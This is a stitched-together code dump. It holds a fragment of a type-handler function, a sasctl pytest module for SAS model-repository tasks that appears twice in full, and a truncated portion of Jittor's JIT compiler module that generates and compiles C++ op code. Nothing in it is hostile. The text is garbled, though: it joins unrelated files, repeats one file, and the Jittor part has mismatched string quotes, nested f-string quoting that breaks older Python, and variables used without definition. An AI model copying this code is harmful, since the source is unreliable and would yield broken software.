alias_list in aliases.items(): for alias in alias_list: type_handlers.update({ alias: type_handlers[k] }) return type_handlers TYPE_HANDLERS = make_type_handlers()
#!/usr/bin/env python # encoding: utf-8 # # Copyright © 2019, SAS Institute Inc., Cary, NC, USA. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 import pytest from six.moves import mock from sasctl.core import RestObj from sasctl._services.model_repository import ModelRepository def test_sklearn_metadata(): pytest.importorskip('sklearn') from sasctl.tasks import _sklearn_to_dict from sklearn.linear_model import LogisticRegression, LinearRegression from sklearn.ensemble import GradientBoostingClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.svm import SVC info = _sklearn_to_dict(LinearRegression()) assert info['algorithm'] == 'Linear regression' assert info['function'] == 'prediction' info = _sklearn_to_dict(LogisticRegression()) assert info['algorithm'] == 'Logistic regression' assert info['function'] == 'classification' info = _sklearn_to_dict(SVC()) assert info['algorithm'] == 'Support vector machine' assert info['function'] == 'classification' info = _sklearn_to_dict(GradientBoostingClassifier()) assert info['algorithm'] == 'Gradient boosting' assert info['function'] == 'classification' info = _sklearn_to_dict(DecisionTreeClassifier()) assert info['algorithm'] == 'Decision tree' assert info['function'] == 'classification' info = _sklearn_to_dict(RandomForestClassifier()) assert info['algorithm'] == 'Forest' assert info['function'] == 'classification' def test_parse_module_url(): from sasctl.tasks import _parse_module_url body = RestObj({'createdBy': 'sasdemo', 'creationTimeStamp': '2019-08-26T15:16:42.900Z', 'destinationName': 'maslocal', 'id': '62cae262-7287-412b-8f1d-bd2a12c8b434', 'links': [{'href': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730', 'method': 'GET', 'rel': 'up', 'type': 'application/vnd.sas.models.publishing.publish', 'uri': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730'}, {'href': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730/log', 'method': 'GET', 'rel': 'self', 'type': 'application/json', 'uri': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730/log'}], 'log': 'SUCCESS==={"links":[{"method":"GET","rel":"up","href":"/microanalyticScore/jobs","uri":"/microanalyticScore/jobs","type":"application/vnd.sas.collection","itemType":"application/vnd.sas.microanalytic.job"},{"method":"GET","rel":"self","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","type":"application/vnd.sas.microanalytic.job"},{"method":"GET","rel":"source","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/source","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/source","type":"application/vnd.sas.microanalytic.module.source"},{"method":"GET","rel":"submodules","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/submodules","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/submodules","type":"application/vnd.sas.collection","itemType":"application/vnd.sas.microanalytic.submodule"},{"method":"DELETE","rel":"delete","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3"},{"method":"GET","rel":"module","href":"/microanalyticScore/modules/decisiontree","uri":"/microanalyticScore/modules/decisiontree","type":"application/vnd.sas.microanalytic.module"}],"version":1,"createdBy":"sasdemo","creationTimeStamp":"2019-08-26T15:16:42.857Z","modifiedBy":"sasdemo","modifiedTimeStamp":"2019-08-26T15:16:48.988Z","id":"465ecad8-cfd0-4403-ac8a-e49cd248fae3","moduleId":"decisiontree","state":"completed","errors":[]}', 'modelId': '459aae0d-d64f-4376-94e7-be31911f4bdb', 'modelName': 'DecisionTree', 'modifiedBy': 'sasdemo', 'modifiedTimeStamp': '2019-08-26T15:16:49.315Z', 'publishName': 'Decision Tree', 'version': 1}) msg = body.get('log').lstrip('SUCßCESS===') assert _parse_module_url(msg) == '/microanalyticScore/modules/decisiontree' def test_save_performance_project_types(): from sasctl.tasks import update_model_performance with mock.patch('sasctl._services.model_repository.ModelRepository.get_model') as model: with mock.patch('sasctl._services.model_repository.ModelRepository.get_project') as project: model.return_value = RestObj(name='fakemodel', projectId=1) # Function is required with pytest.raises(ValueError): project.return_value = {} update_model_performance(None, None, None) # Target Level is required with pytest.raises(ValueError): project.return_value = {'function': 'Prediction'} update_model_performance(None, None, None) # Prediction variable required with pytest.raises(ValueError): project.return_value = {'function': 'Prediction', 'targetLevel': 'Binary'} update_model_performance(None, None, None) # Classification variable required with pytest.raises(ValueError): project.return_value = {'function': 'classification', 'targetLevel': 'Binary'} update_model_performance(None, None, None) # Check projects w/ invalid properties @mock.patch.object(ModelRepository, 'list_repositories') @mock.patch.object(ModelRepository, 'get_project') def test_register_model_403_error(get_project, list_repositories): """Verify HTTP 403 is converted to a user-friendly error. Depending on environment configuration, this can happen when attempting to find a repository. See: https://github.com/sassoftware/python-sasctl/issues/39 """ from six.moves.urllib.error import HTTPError from sasctl.exceptions import AuthorizationError from sasctl.tasks import register_model get_project.return_value = {'name': 'Project Name'} list_repositories.side_effect = HTTPError(None, 403, None, None, None) # HTTP 403 error when getting repository should throw a user-friendly # AuthorizationError with pytest.raises(AuthorizationError): register_model(None, 'model name', 'project name') # All other errors should be bubbled up list_repositories.side_effect = HTTPError(None, 404, None, None, None) with pytest.raises(HTTPError): register_model(None, 'model name', 'project name')
#!/usr/bin/env python # encoding: utf-8 # # Copyright © 2019, SAS Institute Inc., Cary, NC, USA. All Rights Reserved. # SPDX-License-Identifier: Apache-2.0 import pytest from six.moves import mock from sasctl.core import RestObj from sasctl._services.model_repository import ModelRepository def test_sklearn_metadata(): pytest.importorskip('sklearn') from sasctl.tasks import _sklearn_to_dict from sklearn.linear_model import LogisticRegression, LinearRegression from sklearn.ensemble import GradientBoostingClassifier from sklearn.tree import DecisionTreeClassifier from sklearn.ensemble import RandomForestClassifier from sklearn.svm import SVC info = _sklearn_to_dict(LinearRegression()) assert info['algorithm'] == 'Linear regression' assert info['function'] == 'prediction' info = _sklearn_to_dict(LogisticRegression()) assert info['algorithm'] == 'Logistic regression' assert info['function'] == 'classification' info = _sklearn_to_dict(SVC()) assert info['algorithm'] == 'Support vector machine' assert info['function'] == 'classification' info = _sklearn_to_dict(GradientBoostingClassifier()) assert info['algorithm'] == 'Gradient boosting' assert info['function'] == 'classification' info = _sklearn_to_dict(DecisionTreeClassifier()) assert info['algorithm'] == 'Decision tree' assert info['function'] == 'classification' info = _sklearn_to_dict(RandomForestClassifier()) assert info['algorithm'] == 'Forest' assert info['function'] == 'classification' def test_parse_module_url(): from sasctl.tasks import _parse_module_url body = RestObj({'createdBy': 'sasdemo', 'creationTimeStamp': '2019-08-26T15:16:42.900Z', 'destinationName': 'maslocal', 'id': '62cae262-7287-412b-8f1d-bd2a12c8b434', 'links': [{'href': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730', 'method': 'GET', 'rel': 'up', 'type': 'application/vnd.sas.models.publishing.publish', 'uri': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730'}, {'href': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730/log', 'method': 'GET', 'rel': 'self', 'type': 'application/json', 'uri': '/modelPublish/models/44d526bc-d513-4637-b8a7-72daee4a7730/log'}], 'log': 'SUCCESS==={"links":[{"method":"GET","rel":"up","href":"/microanalyticScore/jobs","uri":"/microanalyticScore/jobs","type":"application/vnd.sas.collection","itemType":"application/vnd.sas.microanalytic.job"},{"method":"GET","rel":"self","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","type":"application/vnd.sas.microanalytic.job"},{"method":"GET","rel":"source","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/source","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/source","type":"application/vnd.sas.microanalytic.module.source"},{"method":"GET","rel":"submodules","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/submodules","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3/submodules","type":"application/vnd.sas.collection","itemType":"application/vnd.sas.microanalytic.submodule"},{"method":"DELETE","rel":"delete","href":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3","uri":"/microanalyticScore/jobs/465ecad8-cfd0-4403-ac8a-e49cd248fae3"},{"method":"GET","rel":"module","href":"/microanalyticScore/modules/decisiontree","uri":"/microanalyticScore/modules/decisiontree","type":"application/vnd.sas.microanalytic.module"}],"version":1,"createdBy":"sasdemo","creationTimeStamp":"2019-08-26T15:16:42.857Z","modifiedBy":"sasdemo","modifiedTimeStamp":"2019-08-26T15:16:48.988Z","id":"465ecad8-cfd0-4403-ac8a-e49cd248fae3","moduleId":"decisiontree","state":"completed","errors":[]}', 'modelId': '459aae0d-d64f-4376-94e7-be31911f4bdb', 'modelName': 'DecisionTree', 'modifiedBy': 'sasdemo', 'modifiedTimeStamp': '2019-08-26T15:16:49.315Z', 'publishName': 'Decision Tree', 'version': 1}) msg = body.get('log').lstrip('SUCßCESS===') assert _parse_module_url(msg) == '/microanalyticScore/modules/decisiontree' def test_save_performance_project_types(): from sasctl.tasks import update_model_performance with mock.patch('sasctl._services.model_repository.ModelRepository.get_model') as model: with mock.patch('sasctl._services.model_repository.ModelRepository.get_project') as project: model.return_value = RestObj(name='fakemodel', projectId=1) # Function is required with pytest.raises(ValueError): project.return_value = {} update_model_performance(None, None, None) # Target Level is required with pytest.raises(ValueError): project.return_value = {'function': 'Prediction'} update_model_performance(None, None, None) # Prediction variable required with pytest.raises(ValueError): project.return_value = {'function': 'Prediction', 'targetLevel': 'Binary'} update_model_performance(None, None, None) # Classification variable required with pytest.raises(ValueError): project.return_value = {'function': 'classification', 'targetLevel': 'Binary'} update_model_performance(None, None, None) # Check projects w/ invalid properties @mock.patch.object(ModelRepository, 'list_repositories') @mock.patch.object(ModelRepository, 'get_project') def test_register_model_403_error(get_project, list_repositories): """Verify HTTP 403 is converted to a user-friendly error. Depending on environment configuration, this can happen when attempting to find a repository. See: https://github.com/sassoftware/python-sasctl/issues/39 """ from six.moves.urllib.error import HTTPError from sasctl.exceptions import AuthorizationError from sasctl.tasks import register_model get_project.return_value = {'name': 'Project Name'} list_repositories.side_effect = HTTPError(None, 403, None, None, None) # HTTP 403 error when getting repository should throw a user-friendly # AuthorizationError with pytest.raises(AuthorizationError): register_model(None, 'model name', 'project name') # All other errors should be bubbled up list_repositories.side_effect = HTTPError(None, 404, None, None, None) with pytest.raises(HTTPError): register_model(None, 'model name', 'project name')
# *************************************************************** # Copyright (c) 2021 Jittor. All Rights Reserved. # Maintainers: Dun Liang <randonlang@gmail.com>. # This file is subject to the terms and conditions defined in # file 'LICENSE.txt', which is part of this source code package. # *************************************************************** import subprocess as sp import os import re import sys import glob import inspect import datetime import threading import platform import ctypes import platform from ctypes import cdll from ctypes.util import find_library import jittor_utils as jit_utils from jittor_utils import LOG, run_cmd, cache_path, find_exe, cc_path, cc_type, cache_path from . import pyjt_compiler from jittor_utils import lock from jittor_utils import install_cuda from jittor import __version__ import hashlib def find_jittor_path(): return os.path.dirname(__file__) def make_cache_dir(cache_path): if not os.path.isdir(cache_path): LOG.i(f"Create cache dir: {cache_path}") os.mkdir(cache_path) def shsplit(s): s1 = s.split(' ') s2 = [] count = 0 for s in s1: nc = s.count('"') + s.count('\'') if count&1: count += nc s2[-1] += " " s2[-1] += s else: count = nc s2.append(s) return s2 def remove_flags(flags, rm_flags): flags = shsplit(flags) output = [] for s in flags: ss = s.replace("\"", "") for rm in rm_flags: if ss.startswith(rm) or ss.endswith(rm): break else: output.append(s) return " ".join(output) def moveback_flags(flags, rm_flags): flags = shsplit(flags) output = [] output2 = [] for s in flags: ss = s.replace("\"", "") for rm in rm_flags: if ss.startswith(rm) or ss.endswith(rm): output2.append(s) break else: output.append(s) return " ".join(output+output2) def map_flags(flags, func): flags = shsplit(flags) output = [] for s in flags: output.append(func(s)) return " ".join(output) def compile(compiler, flags, inputs, output, combind_build=False, cuda_flags=""): def do_compile(cmd): if jit_utils.cc: return jit_utils.cc.cache_compile(cmd, cache_path, jittor_path) else: run_cmd(cmd) return True base_output = os.path.basename(output).split('.')[0] if os.name == 'nt': # windows do not combind build, need gen def combind_build = False # windows need xxxx.lib afile = output.rsplit('.', 1)[0] + ".lib" afile = os.path.join(cache_path, afile) if cc_type != 'cl': # initialize order in windows seems reversed inputs = list(inputs[::-1]) link = link + f' -Wl,--export-all-symbols,--out-implib,"{afile}" ' if not os.path.isabs(output): output = os.path.join(cache_path, output) # don't recompile object file in inputs obj_files = [] ex_obj_files = [] new_inputs = [] for name in inputs: if name[-1] in 'oab': ex_obj_files.append(name) else: new_inputs.append(os.path.join(jittor_path, name)) obj_files.append(os.path.join( cache_path, "obj_files", os.path.basename(name)+".o")) inputs = new_inputs cm = lambda s: f"\"{s}\"" cms = lambda arr: [f"\"{s}\"" for s in arr ] if len(inputs) == 1 or combind_build: cmd = f"\"{compiler}\" {" ".join(cms(inputs))} {flags} -o {cm(output)}" return do_compile(fix_cl_flags(cmd)) # split compile object file and link # remove -l -L flags when compile object files oflags = remove_flags(flags, ['-l', '-L', '-Wl,', '.lib', '-shared']) cmds = [] for input, obj_file in zip(inputs, obj_files): cc = compiler nflags = oflags cmd = f"{cm(input)} {nflags} {lto_flags} -c -o {cm(obj_file)}" if input.endswith(".cu"): if has_cuda: cmd = f"\"{nvcc_path}\" {cuda_flags} {cmd}" cmd = convert_nvcc_flags(fix_cl_flags(cmd)) else: continue else: cmd = f"\"{cc}\" {cmd}" cmd = fix_cl_flags(cmd) if "nan_checker" in input: # nan checker needs to disable fast_math cmd = cmd.replace("--use_fast_math", "") cmd = cmd.replace("-Ofast", "-O2") cmds.append(cmd) jit_utils.run_cmds(cmds, cache_path, jittor_path, "Compiling "+base_output) obj_files += ex_obj_files if os.name == 'nt': dumpdef_path = os.path.join(jittor_path, "utils", "dumpdef.py") cmd = f"\"{sys.executable}\" \"{dumpdef_path}\" {" ".join(cms(obj_files))} -Fo: \"{output}.def\"" do_compile(fix_cl_flags(cmd)) cmd = f"\"{compiler}\" {" ".join(cms(obj_files))} -o {cm(output)} {flags} {lto_flags}" return do_compile(fix_cl_flags(cmd)) def gen_jit_tests(): all_src = glob.glob(jittor_path+"/src/**/*.cc", recursive=True) jit_declares = [] re_def = re.compile("JIT_TEST\\((.*?)\\)") names = set() test_defs = [] for src_name in all_src: with open(src_name, 'rb') as f: src = f.read().decode('utf8') defs = re_def.findall(src) for name in defs: LOG.vv(f"Find test {name} from {src_name}") assert name not in names, f"Conflict test name {name}" names.add(name) jit_declares.append(f"JIT_TEST({name});") test_defs.append(f""" /* From {src_name} */ // @pyjt({name}) static inline void test_{name}() {{ jit_test_{name}(); }} """) jit_declares = "\n ".join(jit_declares) jit_src = f""" #pragma once #include "common.h" void expect_error(std::function<void()> func) {{ try {{ func(); }} catch (...) {{ return; }} CHECK(0) << "Missing error"; }} namespace jittor {{ {jit_declares} // @pyjt(tests) // @attrs(submodule) namespace tests {{ {"".join(test_defs)} }} }} // jittor """ LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_tests.h"), 'w') as f: f.write(jit_src) def gen_jit_flags(): all_src = glob.glob(jittor_path+"/src/**/*.cc", recursive=True) jit_declares = [] re_def = re.compile("DEFINE_FLAG(_WITH_SETTER)?\\((.*?)\\);", re.DOTALL) flags_defs = [] visit = {} for src_name in all_src: with open(src_name, 'rb') as f: src = f.read().decode("utf8") defs = re_def.findall(src) for _, args in defs: args = args.split(",") type = args[0].strip() name = args[1].strip() if not has_cuda and "cuda" in name and name!="use_cuda": continue default = args[2].strip() doc = ",".join(args[3:]) doc = eval(f"({doc})") LOG.vv(f"Find define {name} from {src_name}") if name in visit: continue visit[name] = 1 jit_declares.append(f"DECLARE_FLAG({type}, {name});") flags_defs.append(f""" /* {name}(type:{type}, default:{default}): {doc} */ // @pyjt(__get__{name}) {type} _get_{name}() {{ return {name}; }} // @pyjt(__set__{name}) void _set_{name}({type} v) {{ set_{name}(v); }} {f'''// @pyjt(__set__{name}) void _set_{name}(bool v) {{ set_{name}(v); }} ''' if type=="int" else ""} """) jit_declares = "\n ".join(jit_declares) jit_src = f""" #include "utils/flags.h" namespace jittor {{ {jit_declares} // @pyjt(Flags) struct _Flags {{ // @pyjt(__init__) _Flags() {{}} {"".join(flags_defs)} }}; }} // jittor """ LOG.vvvv(jit_src) with open(os.path.join(cache_path, "gen", "jit_flags.h"), 'w') as f: f.write(jit_src) def gen_jit_op_maker(op_headers, export=False, extra_flags=""): def add_src( cc_func_name, cc_args, op_name, op_args, src, pybind_name, py_args, jit_cc_src, doc_string, attrs ): has_ir = set(["add", "sub", "mul", "matmul", "truediv", "floordiv", "mod", "divmod", "pow", "lshift", "rshift", "and", "xor", "or"]) pybind_names = [ s.strip() for s in pybind_name.split(",")] cc_make_args = [ arg.replace("VarHolder*", "Var*") for arg in cc_args ] op_make_args = [ arg.replace("->var", "") for arg in op_args ] py_args = [ arg.replace("Var*", "VarHolder*") for arg in py_args ] op_args = [] cc_args_with_default = [] for i, arg in enumerate(cc_args): pre_arg = arg.split()[-1].split('=')[0] op_arg = None if arg.startswith("VarHolder*"): op_arg = pre_arg+"->var" elif arg.startswith("vector<VarHolder*>"): op_arg = f"convert({pre_arg})" if "&&" in arg: if op_arg == None: op_arg = "move("+pre_arg+")" op_make_args[i] = "move("+pre_arg+")" if op_arg==None: op_arg = pre_arg op_args.append(op_arg) py_arg = py_args[i] if "_a=" not in py_arg: cc_args_with_default.append(arg) continue py_arg = py_arg.split("_a=")[1] cc_args_with_default.append(arg + "=" + py_arg) cc_args = cc_args_with_default # steps of Op creation: # 1. new op # 2. new output var (create_output in op constructor) # 3. take over op's output VarPtr from outputs_holder # 4. set op's output # 5. set op's input # 6. infer shape(op->init()) if "multiple_outputs" not in attrs: jit_cc_src.append(f""" VarPtr make_{cc_func_name}({", ".join(cc_make_args)}) {{ auto _op = new {op_name}({", ".join(op_make_args)}); if (_op->outputs_holder.size() != 1) {{ delete _op; LOGf << "Wrong output size of" << \"{op_name}\"; }} if (_op->flags.get(NodeFlags::_forwarded)) {{ VarPtr _out(move(_op->outputs_holder[0])); delete _op; return _out; }} _op->outputs_holder[0]->set_inputs({{_op}}); VarPtr _out(move(_op->outputs_holder[0])); {src.replace("->var","")}; _op->init(); return _out; }} """) else: jit_cc_src.append(f""" vector<VarPtr> make_{cc_func_name}({", ".join(cc_make_args)}) {{ auto _op = new {op_name}({", ".join(op_make_args)}); if (_op->flags.get(NodeFlags::_forwarded)) {{ vector<VarPtr> _outs = move(_op->outputs_holder); delete _op; return _outs; }} vector<VarPtr> _outs = move(_op->outputs_holder); for (uint i=0; i<_outs.size(); i++) _outs[i]->set_inputs({{_op}}); {src.replace("->var","")}; _op->init(); return _outs; }} """) if pybind_name == 'None': return pyjt_names = [] for pybind_name in pybind_names: if pybind_name.startswith("__"): pyjt_names.append("Var."+pybind_name) else: pyjt_names.append(pybind_name) if len(cc_args)>0 and cc_args[0].startswith("VarHolder* "): pyjt_names.append("Var."+pybind_name) if "multiple_outputs" in attrs: jit_cc_src.append(f""" /*{doc_string}*/ // @pyjt({",".join(pyjt_names)}) vector<VarHolder*> {cc_func_name}({", ".join(cc_args)}) {{ { f'return make_vh_vector(make_{cc_func_name}({', '.join(op_args)}));' if "replace_outputs" not in attrs else f'''auto rt = make_vh_vector(make_{cc_func_name}({", ".join(op_args)})); ASSERT(rt.size() == outputs.size()); for (int i=0; i<outputs.size(); i++) outputs[i]->assign(rt[i]); return rt; '''} }} """) else: jit_cc_src.append(f""" /*{doc_string}*/ // @pyjt({",".join(pyjt_names)}) VarHolder* {cc_func_name}({", ".join(cc_args)}) {{ return new VarHolder(make_{cc_func_name}({", ".join(op_args)})); }} """) need_ir_define = False ir_name = None for pybind_name in pybind_names: if pybind_name.startswith("__") and pybind_name[2:-2] in has_ir: need_ir_define = True assert ir_name is None ir_name = pybind_name[2:-2] if need_ir_define: assert len(cc_args)>0 and cc_args[0].startswith("VarHolder* ") this = cc_args[0].split()[-1] jit_cc_src.append(f""" // @pyjt(Var.__i{ir_name}__) // @attrs(return_self) VarHolder* i{cc_func_name}({", ".join(cc_args)}) {{ *{this} = make_{cc_func_name}({", ".join(op_args)}); return {this}; }} """) assert len(cc_args)>1 and cc_args[1].startswith("VarHolder* "), cc_args r_cc_args = [cc_args[1], cc_args[0]] + cc_args[2:] r_py_args = [py_args[1], py_args[0]] + py_args[2:] jit_cc_src.append(f""" VarHolder* r{cc_func_name}({", ".join(r_cc_args)}) {{ return new VarHolder(make_{cc_func_name}({", ".join(op_args)})); }} """) jit_cc_src = [] jit_headers = "" initer = [] pybind_reg = '(/\\*(.*?)\\*/\\s*)?(//\\s*@pybind\\(([^\\n]*)\\)\\s*)?' pybind_attrs_reg = pybind_reg + '(//\\s*@attrs\\(([^\\n]*)\\)\\s*)?' for header in op_headers: # xxx_xxx_op name = os.path.basename(header) name = os.path.splitext(name)[0] # xxx_xxx assert name.endswith("_op") func_name = name[:-3] # XxxXxxOp name2 = map(lambda s:s[:1].upper() + s[1:], name.split('_')) name2 = "".join(name2) with open(header, encoding='utf8') as f: src = f.read() # XxxXxxOp(args) res = re.findall(pybind_attrs_reg + '[^~]('+name2+"\\([^\\n]*\\))", src, re.S) assert len(res) >= 1, "Wrong op args in " + header # registe op cc_name = header[:-2] + ".cc" constructors = [] for i in range(len(res)): name = 'make_'+func_name+'_'*i constructors.append(f"{{ &typeid(&{name}), (void*)&{name} }}") constructors = ",".join(constructors) var_member_reg = r"\n\s*Var\b(.*);" var_member_match = re.findall(var_member_reg, src) var_member_match = " ".join(var_member_match) for c in "*,": var_member_match = var_member_match.replace(c, " ") var_member = var_member_match.split() LOG.vv("var_member_match "+var_member_match) LOG.vv("var_member "+str(var_member)) var_member_src = [ f"VAR_MEMBER_NAME_AND_OFFSET({name}, {name2})" for name in var_member ] var_member_src = ",".join(var_member_src) initer.append(f'\n op_registe({{ '{func_name}', R'({cc_name})", extra_flags, {{{constructors}}}, {{{var_member_src}}} }});') for hid, h_def in enumerate(res): h_def = list(h_def) # // @attrs(...) attrs = {} if h_def[4] != "": attrs = pyjt_compiler.parse_attrs(h_def[5]) del h_def[4:6] # /* doc_string */ # // @pybind(bind_name) # XxxXxxOp(args_def) doc_string = h_def[1].strip() h_def = h_def[2:] args_def = h_def[2][len(name2)+1:-1] bind_name = h_def[1] if bind_name == "": bind_name = func_name if args_def=="": args = [] else: args = list(map(lambda s: s.split()[-1].split('=')[0], args_def.split(','))) # py_args: "arg"_a=default py_args = [] new_args_def = [] new_args = [] # source of convert VarHolder* to Var* vh2v_src = [] more_src = [] for arg, arg_def in zip(args, args_def.split(',')): py_arg = f'"{arg}"_a' if '=' in arg_def: py_arg += "=" + arg_def.split('=')[-1] arg_def = arg_def.split('=')[0] py_args.append(py_arg) arg_type = arg_def[:-(len(arg)+1)].strip() if arg_type == "Var*": new_args_def.append("VarHolder* " + arg) vh2v_src.append(arg + "->var") new_args.append(arg + "->var") elif arg_type.startswith("vector<Var*>"): new_args_def.append( arg_type.replace("Var", "VarHolder")+' '+arg) new_args.append(arg) more_src.append(f"_op->add_inputs({arg});") elif arg_type.startswith("VarSlices"): new_args_def.append(arg_def) new_args.append(arg) more_src.append(f""" vector<Var*> svars; for (int i=0; i<_op->vs.n; i++) if (_op->vs.slices[i].is_var()) svars.push_back(_op->vs.slices[i].var); _op->add_inputs(svars);""") else: new_args_def.append(arg_def) new_args.append(arg) vh2v_src = "_op->set_inputs({" + ", ".join(vh2v_src) + "});" + \ "".join(more_src) LOG.vvvv(f"Find op: {name2} args: {new_args}") # if header.startswith("src/"): # jit_headers += f"#include \"{header[4:]}\"\n" # else: jit_headers += f"#include \"{header}\"\n" add_src( func_name+'_'*hid, new_args_def, name2, new_args, vh2v_src, bind_name, py_args, jit_cc_src, doc_string, attrs ) if func_name in ["binary", "unary", "reduce"]: # generate binary op alias with open(os.path.join(jittor_path, f"src/ops/{func_name}_op.cc"), encoding="utf-8") as f: src = f.read() src = src.split(f"unordered_set<string> {func_name}_ops = ""{")[1].split("};")[0] match_result = re.findall(pybind_reg + "\"([a-z_A-Z0-9]*)\"", src, re.S) # remove /* doc_string */ pattern res2 = [ (_[3], _[4]) for _ in match_result ] LOG.vvvv(f"All supported {func_name} ops: {res2}") # remove op args if func_name == "reduce": args_def = new_args_def[:1] + new_args_def[2:] py_args_s = py_args[:1] + py_args[2:] else: args_def = new_args_def[:-1] py_args_s = py_args[:-1] # find the last type id(float64) # add "_" suffix for all function if func_name == "unary": last_tid = res2.index(("","float64")) # for each functor for tid, (bind_name, func_name2) in enumerate(res2): # get certain op doc_string doc_string2 = match_result[tid][1].strip() if len(doc_string2) == 0: doc_string2 = doc_string # add _ for types if func_name == "unary" and tid <= last_tid: func_name3 = func_name2 + "_" elif func_name == "reduce": func_name4 = func_name2 func_name2 = "reduce_" + func_name2 func_name3 = func_name2 else: func_name3 = func_name2 if len(bind_name) == 0: bind_name = func_name2 if func_name == "reduce": args = new_args[:1] + [f'ns_{func_name4}'] + new_args[2:] else: args = new_args[:-1] + [f'ns_{func_name2}'] add_src( func_name3+'_'*hid, args_def, name2, args, vh2v_src, bind_name, py_args_s, jit_cc_src, doc_string2, attrs ) jit_src = f""" #pragma once #include "pyjt/py_obj_holder.h" #include "var.h" #include "var_holder.h" #include "ops/op_register.h" {jit_headers} namespace jittor {{ // fix make_array(py::array) undefine reference #pragma GCC visibility push(default) #define JIT_NAMESPACE {export+"_maker" if export else "jit_op_maker"} // @pyjt(ops) // @attrs(submodule{",core_name="+export if export else ""}) namespace JIT_NAMESPACE {{ {"".join(jit_cc_src)} void initer() {{ string extra_flags = R"({extra_flags})"; {"".join(initer)} }} int caller = (initer(), 0); }} // JIT_NAMESPACE }} // jittor {f''' namespace jittor {{ extern void pyjt_def_{export}(PyObject*); }} static void init_module(PyModuleDef* mdef, PyObject* m) {{ mdef->m_doc = "User defined custom ops"; jittor::pyjt_def_{export}(m); }} PYJT_MODULE_INIT({export}); ''' if export else ""} """ return jit_src @lock.lock_scope() def compile_custom_op(header, source, op_name, warp=True): """Compile a single custom op header: code of op header, not path source: code of op source, not path op_name: op_name of this op, it will used for generation of header and source files, if the type name of op is XxxXxxOp, op_name should be xxx_xxx warp: if true, warp a snippet for header and source """ if warp: header = f""" #pragma once #include "op.h" #include "var.h" namespace jittor {{ {header} }} """ source = f""" #include "{op_name}_op.h" namespace jittor {{ {source} }} """ cops_dir = os.path.join(cache_path, "custom_ops") make_cache_dir(cops_dir) hname = os.path.join(cops_dir, op_name+"_op.h") ccname = os.path.join(cops_dir, op_name+"_op.cc") with open(hname, 'w') as f: f.write(header) with open(ccname, 'w') as f: f.write(source) m = compile_custom_ops([hname, ccname]) return getattr(m, op_name) @lock.lock_scope() def compile_custom_ops( filenames, extra_flags="", return_module=False, dlopen_flags=None, gen_name_ = ""): """Compile custom ops filenames: path of op source files, filenames must be pairs of xxx_xxx_op.cc and xxx_xxx_op.h, and the type name of op must be XxxXxxOp. extra_flags: extra compile flags return_module: return module rather than ops(default: False) return: compiled ops """ if dlopen_flags is None: dlopen_flags = os.RTLD_GLOBAL | os.RTLD_NOW if platform.system() == 'Linux': dlopen_flags |= os.RTLD_DEEPBIND srcs = {} headers = {} builds = [] includes = [] pyjt_includes = [] for name in filenames: name = os.path.realpath(name) if name.endswith(".cc") or name.endswith(".cpp") or name.endswith(".cu"): builds.append(name) if name.endswith(".h"): dirname = os.path.dirname(name) if dirname.endswith("inc"): includes.append(dirname) with open(name, "r") as f: if "@pyjt" in f.read(): pyjt_includes.append(name) bname = os.path.basename(name) bname = os.path.splitext(bname)[0] if bname.endswith("_op"): bname = bname[:-3] if name.endswith(".cc"): srcs[bname] = name elif name.endswith(".h"): includes.append(os.path.dirname(name)) headers[bname] = name assert len(srcs) == len(headers), "Source and header names not match" for name in srcs: assert name in headers, f"Header of op {name} not found" gen_name = "gen_ops_" + "_".join(headers.keys()) if gen_name_ != "": gen_name = gen_name_ if len(gen_name) > 50: gen_name = gen_name[:50] + "___hash" + hashlib.md5(gen_name.encode()).hexdigest()[:6] includes = sorted(list(set(includes))) includes = "".join(map(lambda x: f" -I\"{x}\" ", includes)) LOG.vvvv(f"Include flags:{includes}") op_extra_flags = includes + extra_flags lib_path = os.path.join(cache_path, "custom_ops") make_cache_dir(lib_path) gen_src_fname = os.path.join(lib_path, gen_name+".cc") gen_head_fname = os.path.join(lib_path, gen_name+".h") gen_lib = os.path.join(lib_path, gen_name+extension_suffix) libname = gen_name + lib_suffix op_extra_flags += f" -L\"{lib_path}\" -l\"{libname}\" " gen_src = gen_jit_op_maker(headers.values(), export=gen_name, extra_flags=op_extra_flags) pyjt_compiler.compile_single(gen_head_fname, gen_src_fname, src=gen_src) # gen src initialize first builds.insert(0, gen_src_fname) def insert_anchor(gen_src, anchor_str, insert_str): # insert insert_str after anchor_str into gen_src return gen_src.replace(anchor_str, anchor_str+insert_str, 1) for name in pyjt_includes: LOG.v("handle pyjt_include ", name) bname = os.path.basename(name).split(".")[0] gen_src_fname = os.path.join(cache_path, "custom_ops", gen_name+"_"+bname+".cc") pyjt_compiler.compile_single(name, gen_src_fname) builds.insert(1, gen_src_fname) gen_src = insert_anchor(gen_src, "namespace jittor {", f"extern void 